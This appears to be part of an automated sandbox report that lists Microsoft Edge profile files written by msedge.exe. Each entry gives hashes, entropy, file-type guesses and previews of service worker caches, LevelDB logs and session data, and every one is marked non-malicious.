                                                                                                                                                                                                                                                                                                                          Size (bytes):2394
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.803247967602321
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:F2xc5Nm6cncmoDCRORpllg2hEYfRHUDldCRORpllg2huaTk5FCRORpllg2hEDRHB:F2emDMrd6YfB0rdUa+rd6DBLrdqOBr
                                                                                                                                                                                                                                                                                                                          MD5:CE7EEF4580D51D1EC09277E06AF8FADB
                                                                                                                                                                                                                                                                                                                          SHA1:B722732C2FB87AEC2B406F652A6D64FCCEC95242
                                                                                                                                                                                                                                                                                                                          SHA-256:E601999EA548F4C2BCCCC4710DD4E2C566B204A07C862369AD307C5E4A453D71
                                                                                                                                                                                                                                                                                                                          SHA-512:1C553B2EC74EC3C03F9FF432B9C71C745F57F518152902554AFC19AB18AEE879F4EEB63A964D48C303DF122B0AE2E9FEB35AB5CF98D0B9BB3A865C134111B7A4
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:....I................URES:0...INITDATA_NEXT_RESOURCE_ID.1..INITDATA_DB_VERSION.2<...................INITDATA_NEXT_REGISTRATION_ID.1..INITDATA_NEXT_VERSION_ID.1.+INITDATA_UNIQUE_ORIGIN:https://ntp.msn.com/...REG:https://ntp.msn.com/.0......https://ntp.msn.com/edge/ntp...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true .(.0.8......@...Z.b.....trueh..h..h..h..h..h..h..h..h..h..h.!p.x.................................REGID_TO_ORIGIN:0.https://ntp.msn.com/..RES:0.0.......https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmpt

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\CURRENT (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):16
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.2743974703476995
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                                                                                                                                                                          MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                                                                                                                                                                          SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                                                                                                                                                                          SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                                                                                                                                                                          SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\LOG

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):299
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.115905973344341
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6u4pm81923oH+TcwtE/a252KLlguQ6RFN+q2P923oH+TcwtE/a2ZIFUv:76uJxYeb8xLuuQ6R3+v4Yeb8J2FUv
                                                                                                                                                                                                                                                                                                                          MD5:7BD8D16B25249F8B0BB20046A339F7FD
                                                                                                                                                                                                                                                                                                                          SHA1:1B4BBE794C2DF61A564B01EFAD5AE99B1A19A8D2
                                                                                                                                                                                                                                                                                                                          SHA-256:9D7851CED4D208D7A178A685816D8E0C531A6E6C10958E21AF676D3B44E5998D
                                                                                                                                                                                                                                                                                                                          SHA-512:19E45FFB5ED610564A0AEED8BA6FD5CF3BFBA3ED8E37B73C1CB4C944EFB47A04A5A619262EC32E225D3659268B43E0BC707566EE997ABE3D88DC45B92A54E9F3
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:14.198 1fcc Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database since it was missing..2025/01/12-11:23:14.218 1fcc Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database/MANIFEST-000001.

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\Database\MANIFEST-000001

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:OpenPGP Secret Key
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):41
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):4.704993772857998
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                                                                                                                                                                          MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                                                                                                                                                                          SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                                                                                                                                                                          SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                                                                                                                                                                          SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_0

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):115461
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.580163634315031
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:1536:sU906yxPXfOxr1lhCe1nL/ImL/rBZXJCjPXNtc1Gv0WQyGbJT:B9LyxPXfOxr1lMe1nL/5L/TXJ6aWxG9T
                                                                                                                                                                                                                                                                                                                          MD5:8B3807790681A37AD3D64056931B6128
                                                                                                                                                                                                                                                                                                                          SHA1:3553AD032863A8911C9F546E624E490C76CC8083
                                                                                                                                                                                                                                                                                                                          SHA-256:8F3EB8877C1A4DE90EF95CABF154FAC1929CA28327893DD137130BB9AD02EC65
                                                                                                                                                                                                                                                                                                                          SHA-512:8B346E59BEF4630001ECF1E0DA108B2E6C26065064E88CA183F816DC33A75E5AC7A0CD93E7243C335DACFC0222E78E88739AF76B1990254FD0C610083A830EE6
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:0\r..m..........rSG.....0!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var s=t();for(var n in s)("object"==typeof exports?exports:e)[n]=s[n]}}(self,(()=>(()=>{"use strict";var e={894:()=>{try{self["workbox:cacheable-response:6.4.0"]&&_()}catch(e){}},81:()=>{try{self["workbox:core:6.4.0"]&&_()}catch(e){}},485:()=>{try{self["workbox:expiration:6.4.0"]&&_()}catch(e){}},484:()=>{try{self["workbox:navigation-preload:6.4.0"]&&_()}catch(e){}},248:()=>{try{self["workbox:precaching:6.4.0"]&&_()}catch(e){}},492:()=>{try{self["workbox:routing:6.4.0"]&&_()}catch(e){}},154:()=>{try{self["workbox:strategies:6.4.0"]&&_()}catch(e){}}},t={};function s(n){var a=t[n];if(void 0!==a)return a.exports;var r=t[n]={exports:{}};return e[n](r,r.exports,s),r.exports}s.g=function(){if("object"==typeof globalThis)return globalThis;try{return this||new Function("return this")()}catch(e){if("object"==typeof window

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\2cc80dabc69f58b6_1

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:DIY-Thermocam raw data (Lepton 2.x), scale -12287-112, spot sensor temperature -2251799813685248.000000, unit celsius, color scheme 4, calibration: offset 0.000000, slope 38666541809915985395712.000000
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):190017
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):6.389568699061764
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3072:KgeH7bUYYZETWwzC7DX+gL/bz9pFb596vmUYilgJE8Cws:mWwyDXVL/fbL9BUYBu
                                                                                                                                                                                                                                                                                                                          MD5:B1BC1EEE11F6FDA1AA20196F4CBBD6AB
                                                                                                                                                                                                                                                                                                                          SHA1:9A3DE09101FC79BEFBAAA602F44172D5C6305E3E
                                                                                                                                                                                                                                                                                                                          SHA-256:77A95BCDC1FE4ADBC72ABA3460CF8D068F8959E3EB597714F3199CBA6BFC0828
                                                                                                                                                                                                                                                                                                                          SHA-512:691A1959248AD78B95A97E5E872F3B5627F1502C6F2F5676AB6B1568CE7FF60E5B9090421AAFF4D00480D0839787B21107E0679A44DEF0843E3862C80D5559A8
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:0\r..m..........rSG.....0....z3.................;.....x..........,T.8..`,.....L`.....,T...`......L`......Rc2z......exports...RcZ.L....module....Rc&.......define....Rb..x....amd....D..H...........".. ...".. ...!...a..2....]".. ...!...-.....!...|..c.....>a...8v............*.........".. ...!........./..4.....).....$Sb............I`....Da......... ..f..........`...p...0...j...p..H........Q....\..{...https://ntp.msn.com/edge/ntp/service-worker.js?bundles=latest&riverAgeMinutes=2880&navAgeMinutes=2880&networkTimeoutSeconds=5&bgTaskNetworkTimeoutSeconds=8&ssrBasePageNavAgeMinutes=360&enableEmptySectionRoute=true&enableNavPreload=true&enableFallbackVerticalsFeed=true&noCacheLayoutTemplates=true&cacheSSRBasePageResponse=true&enableStaticAdsRouting=true&enableWidgetsRegion=true.a........Db............D`.....E..A.`............,T.,.`......L`.....,T...`>....DL`.....DSb.....................q...1.c................I`....Da.....b...,T.`.`z.....L`..........a............a.........Dr8..............

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):24
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):2.1431558784658327
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:m+l:m
                                                                                                                                                                                                                                                                                                                          MD5:54CB446F628B2EA4A5BCE5769910512E
                                                                                                                                                                                                                                                                                                                          SHA1:C27CA848427FE87F5CF4D0E0E3CD57151B0D820D
                                                                                                                                                                                                                                                                                                                          SHA-256:FBCFE23A2ECB82B7100C50811691DDE0A33AA3DA8D176BE9882A9DB485DC0F2D
                                                                                                                                                                                                                                                                                                                          SHA-512:8F6ED2E91AED9BD415789B1DBE591E7EAB29F3F1B48FDFA5E864D7BF4AE554ACC5D82B4097A770DABC228523253623E4296C5023CF48252E1B94382C43123CB0
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:0\r..m..................

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\temp-index

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):72
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.537634645982951
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:+dMFQyXl/l5/lln/lxEgR/llm5N:+dEzqp5N
                                                                                                                                                                                                                                                                                                                          MD5:47F7267C53C97534E890FEF86B2A5324
                                                                                                                                                                                                                                                                                                                          SHA1:78296EFFCDF1DC9FE36408F996570E2E48546712
                                                                                                                                                                                                                                                                                                                          SHA-256:E85906CECA7C2CEC6388693EBAD3E22171234C7F475B70FBAE48044212BCCC24
                                                                                                                                                                                                                                                                                                                          SHA-512:DCAE7B0FDF12E27E19C31E46658352E554039D3CAF72529848B9E6C82C0CDB6B4E0674FBB8223E3F6B3084A71CE24C643373D11B144BD54F1377A417732B2D30
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:@.....c.oy retne.........................X....,................../.../.

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):72
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.537634645982951
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:+dMFQyXl/l5/lln/lxEgR/llm5N:+dEzqp5N
                                                                                                                                                                                                                                                                                                                          MD5:47F7267C53C97534E890FEF86B2A5324
                                                                                                                                                                                                                                                                                                                          SHA1:78296EFFCDF1DC9FE36408F996570E2E48546712
                                                                                                                                                                                                                                                                                                                          SHA-256:E85906CECA7C2CEC6388693EBAD3E22171234C7F475B70FBAE48044212BCCC24
                                                                                                                                                                                                                                                                                                                          SHA-512:DCAE7B0FDF12E27E19C31E46658352E554039D3CAF72529848B9E6C82C0CDB6B4E0674FBB8223E3F6B3084A71CE24C643373D11B144BD54F1377A417732B2D30
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:@.....c.oy retne.........................X....,................../.../.

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Service Worker\ScriptCache\index-dir\the-real-index~RF48808.TMP (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):72
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.537634645982951
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:3:+dMFQyXl/l5/lln/lxEgR/llm5N:+dEzqp5N
                                                                                                                                                                                                                                                                                                                          MD5:47F7267C53C97534E890FEF86B2A5324
                                                                                                                                                                                                                                                                                                                          SHA1:78296EFFCDF1DC9FE36408F996570E2E48546712
                                                                                                                                                                                                                                                                                                                          SHA-256:E85906CECA7C2CEC6388693EBAD3E22171234C7F475B70FBAE48044212BCCC24
                                                                                                                                                                                                                                                                                                                          SHA-512:DCAE7B0FDF12E27E19C31E46658352E554039D3CAF72529848B9E6C82C0CDB6B4E0674FBB8223E3F6B3084A71CE24C643373D11B144BD54F1377A417732B2D30
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:@.....c.oy retne.........................X....,................../.../.

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\000003.log

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):6019
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.3934684629858882
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:96:99eTYspyeiumV+KtVPVXIj67Z/m9Xp+Y+VijEvA9XLl9iSrk1s6prAtJlNu7K:GTYsIewV+KtVPVXIjh9Xp+YKiY4Ll9iq
                                                                                                                                                                                                                                                                                                                          MD5:3D3BB28E0D38E55DB391C24A0227F343
                                                                                                                                                                                                                                                                                                                          SHA1:C6CE7096345F281C8CA9AEA81EB26CF15E460A24
                                                                                                                                                                                                                                                                                                                          SHA-256:18729F8A46705A1A538CDD5523263B73776B2ABE044AFB84CBC76E9B3FDF2E33
                                                                                                                                                                                                                                                                                                                          SHA-512:8529006C28740B42D45014A97FEDB7FEFBB3E0B9527B7581516BAE2F6CD7443E92A6BCD5F819690DC0B62C2DD71979D68719D7BC93976F2F6A5D4C90D59711B8
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:*...#................version.1..namespace-..&f.................&f.................&f.................&f.................&f................[..b................next-map-id.1.Cnamespace-fd89ab25_d94b_4705_bab3_e14bd5290f2f-https://ntp.msn.com/.0..A.>................map-0-shd_sweeper.,{.".x.-.m.s.-.f.l.i.g.h.t.I.d.".:.".m.s.n.a.l.l.e.x.p.u.s.e.r.s.,.p.r.g.-.s.p.-.l.i.v.e.a.p.i.,.p.r.g.-.f.i.n.-.c.o.m.p.o.f.,.p.r.g.-.f.i.n.-.h.p.o.f.l.i.o.,.p.r.g.-.f.i.n.-.p.o.f.l.i.o.,.p.r.g.-.1.s.w.-.c.c.-.c.a.l.f.e.e.d.i.,.a.d.s.-.c.f.v.4.,.c.-.p.r.g.-.m.s.n.-.s.b.i.d.m.,.p.n.p.w.x.e.x.p.i.r.e.-.c.c.,.b.i.n.g._.v.2._.s.c.o.p.e.-.c.,.p.r.g.-.1.s.w.-.s.a.c.f.x.2.t.4.,.p.r.g.-.1.s.w.-.s.a.g.e.i.m.a.n.n.i.5.c.,.p.r.g.-.1.s.w.-.s.a.l.i.k.e.m.o.r.e.t.3.,.t.r.a.f.f.i.c.-.p.1.-.n.y.l.d.-.t.,.p.r.g.-.1.s.w.-.l.d.n.y.-.t.r.a.n.s.i.t.,.p.r.g.-.1.s.w.-.t.r.a.n.-.t.r.d.,.1.s.-.w.p.o.-.p.r.1.-.s.d.s.h.p.1.5.c.,.p.r.g.-.a.d.s.p.e.e.k.,.p.r.g.-.p.r.2.-.w.i.d.g.e.t.-.t.a.b.,.f.-.r.e.l.-.a.l.l.c.,.b.t.i.e.-.r.e.s.t.o.f.v.

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):321
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.144772086411305
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6uUAq2P923oH+TcwtrQMxIFUtQuxPZmwuuRdkwO923oH+TcwtrQMFLJ:76u9v4YebCFUtQuxP/uuRd5LYebtJ
                                                                                                                                                                                                                                                                                                                          MD5:39583909CFFB09A503A8DC6A7A00DED4
                                                                                                                                                                                                                                                                                                                          SHA1:06C627DBCA128A3A3C17046128E4528117D98E66
                                                                                                                                                                                                                                                                                                                          SHA-256:630265D55C7081EB6991AC4E816E4B67D8A7BB3344D51F7BEED9252967715B37
                                                                                                                                                                                                                                                                                                                          SHA-512:4E37C1C05B31B463292C60EE78CEEDD7F2026D6A01B34D13D01BF4E022F014CA9EC5AB0CB882785173742ECABA5E5A67999A3542B195784818574CC324305477
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:05.946 bb0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/01/12-11:23:05.947 bb0 Recovering log #3.2025/01/12-11:23:05.961 bb0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage\LOG.old (copy)

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):321
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.144772086411305
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6uUAq2P923oH+TcwtrQMxIFUtQuxPZmwuuRdkwO923oH+TcwtrQMFLJ:76u9v4YebCFUtQuxP/uuRd5LYebtJ
                                                                                                                                                                                                                                                                                                                          MD5:39583909CFFB09A503A8DC6A7A00DED4
                                                                                                                                                                                                                                                                                                                          SHA1:06C627DBCA128A3A3C17046128E4528117D98E66
                                                                                                                                                                                                                                                                                                                          SHA-256:630265D55C7081EB6991AC4E816E4B67D8A7BB3344D51F7BEED9252967715B37
                                                                                                                                                                                                                                                                                                                          SHA-512:4E37C1C05B31B463292C60EE78CEEDD7F2026D6A01B34D13D01BF4E022F014CA9EC5AB0CB882785173742ECABA5E5A67999A3542B195784818574CC324305477
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:2025/01/12-11:23:05.946 bb0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/MANIFEST-000001.2025/01/12-11:23:05.947 bb0 Recovering log #3.2025/01/12-11:23:05.961 bb0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Session Storage/000003.log .

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Sessions\Session_13381172587684739

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:data
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):1443
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):3.846443079620115
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:24:3hliMybBSlAyez4psAF4unxMtLp3X2amEtG1Chq9aMIVrWFAQKkOAM4:3hlipjIzFaLp2FEkChEajiRHOp
                                                                                                                                                                                                                                                                                                                          MD5:CA00D8AF9A996A2391EEA24C2C8E2406
                                                                                                                                                                                                                                                                                                                          SHA1:C0A6C3B81CF4175F5956F080198167B85160579E
                                                                                                                                                                                                                                                                                                                          SHA-256:8FA9F7A58708046294B60B74B197A8615BEDCD7A634384255EB168370D77629F
                                                                                                                                                                                                                                                                                                                          SHA-512:105294628A060E9271699849829069184B239FA522E741D3E3CAF0F859C95293774F21ED277B4C432276E7F39E48B687D5167C0054FEDE60BB958C8A71CF4F90
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:SNSS.........O.............O......"..O.............O.........O.........O.........O....!....O.................................O..O1..,.....O$...fd89ab25_d94b_4705_bab3_e14bd5290f2f.....O.........O....C............O.....O.........................O....................5..0.....O&...{98952893-68FF-4A5D-A164-705C709ED3DB}.......O.........O............................O.............O........edge://newtab/......N.e.w. .t.a.b...........!...............................................................x...............................x.......2q@..+..3q@..+.................................. ...................................................r...h.t.t.p.s.:././.n.t.p...m.s.n...c.o.m./.e.d.g.e./.n.t.p.?.l.o.c.a.l.e.=.e.n.-.G.B.&.t.i.t.l.e.=.N.e.w.%.2.0.t.a.b.&.d.s.p.=.1.&.s.p.=.B.i.n.g.&.i.s.F.R.E.M.o.d.a.l.B.a.c.k.g.r.o.u.n.d.=.1.&.s.t.a.r.t.p.a.g.e.=.1.&.P.C.=.U.5.3.1.....................................8.......0.......8............................................................

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Shortcuts

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):20480
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):0.44194574462308833
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:12:TLiNCcUMskMVcIWGhWxBzEXx7AAQlvsdFxOUwa5qgufTJpbZ75fOS:TLisVMnYPhIY5Qlvsd6UwccNp15fB
                                                                                                                                                                                                                                                                                                                          MD5:B35F740AA7FFEA282E525838EABFE0A6
                                                                                                                                                                                                                                                                                                                          SHA1:A67822C17670CCE0BA72D3E9C8DA0CE755A3421A
                                                                                                                                                                                                                                                                                                                          SHA-256:5D599596D116802BAD422497CF68BE59EEB7A9135E3ED1C6BEACC48F73827161
                                                                                                                                                                                                                                                                                                                          SHA-512:05C0D33516B2C1AB6928FB34957AD3E03CB0A8B7EEC0FD627DD263589655A16DEA79100B6CC29095C3660C95FD2AFB2E4DD023F0597BD586DD664769CABB67F8
                                                                                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                                                                                          Preview:SQLite format 3......@ ..........................................................................j..........g....."....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                                                                                                                                                                          C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Site Characteristics Database\LOG

                                                                                                                                                                                                                                                                                                                          Download File
                                                                                                                                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                                          File Type:ASCII text
                                                                                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                                                                                          Size (bytes):352
                                                                                                                                                                                                                                                                                                                          Entropy (8bit):5.125399604737209
                                                                                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                                                                                          SSDEEP:6:iO6uGDOq2P923oH+Tcwt7Uh2ghZIFUtQuNdZmwuuNvkwO923oH+Tcwt7Uh2gnLJ:76uGqv4YebIhHh2FUtQuNd/uuNv5LYeQ
                                                                                                                                                                                                                                                                                                                          MD5:31020AB8BB836CF593BE9253BA07A82E
                                                                                                                                                                                                                                                                                                                          SHA1:2BFBDC9393B01C94F248113D65203ECC1BEFA214
                                                                                                                                                                                                                                                                                                                          SHA-256:D3F433233088ACF17150149643DD0FDEEED8BDBD645271B59D0FF00FE3009AE8
                                                                                                                                                                                                                                                                                                                          SHA-512:5B98E58A8F60FC130042693B137818F445771AD120F3738B368B13C51A0923C517E0AD4F89669489E8BD280C60DE957F5FFF4C55D8C52A6167DD2284F9B52EC0
                                                                                                                                                                                                                                                                                                                          Malicious:false
